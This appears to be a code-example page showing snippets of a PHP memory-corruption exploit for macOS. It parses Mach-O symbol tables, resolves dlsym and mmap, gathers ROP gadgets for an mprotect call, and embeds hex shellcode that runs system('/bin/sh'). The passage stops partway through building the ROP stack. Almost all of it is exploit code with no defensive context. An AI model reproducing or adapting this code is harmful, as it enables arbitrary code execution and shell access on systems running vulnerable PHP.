Exemple #1
0
function getsymtabsym($mh, $name)
{
    if (r32($mh) == 0xfeedfacf) {
        $lc = $mh + 32;
        while ($lc < $mh + r32($mh + 20)) {
            if (r32($lc) == 0x2) {
                $symoff = r32(8 + $lc) + 0x1d000 + $mh;
                $nsyms = r32(12 + $lc);
                $stroff = r32(16 + $lc) + 4 + 0x1d000 + $mh;
                $strsize = r32(20 + $lc);
                $k = 0;
                for ($i = 0; $k < $nsyms; $i++) {
                    $st = rstr($stroff + $k);
                    if ($st == $name) {
                        $nlist = $symoff + $i * 16;
                        $val = r64($nlist + 8) & 0xffffffff + $mh;
                        return $val;
                    }
                    $k += strlen($st) + 1;
                }
            }
            $lc += r32($lc + 4);
        }
    }
    return FALSE;
}
Exemple #2
0
require "pm.php";
require "pm_rop_osx.php";
function w64($x)
{
    return ibuf($x, 8);
}
$all = alloc(4096);
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800");
$addr = rop_findexec();
nogc($addr);
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002");
// find b84a000002      	movl	$0x200004a, %eax -> mprotect syscall
nogc($mprotect);
function ig($a, $b)
{
    return ibuf(gadget($a, $b), 8);
}
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);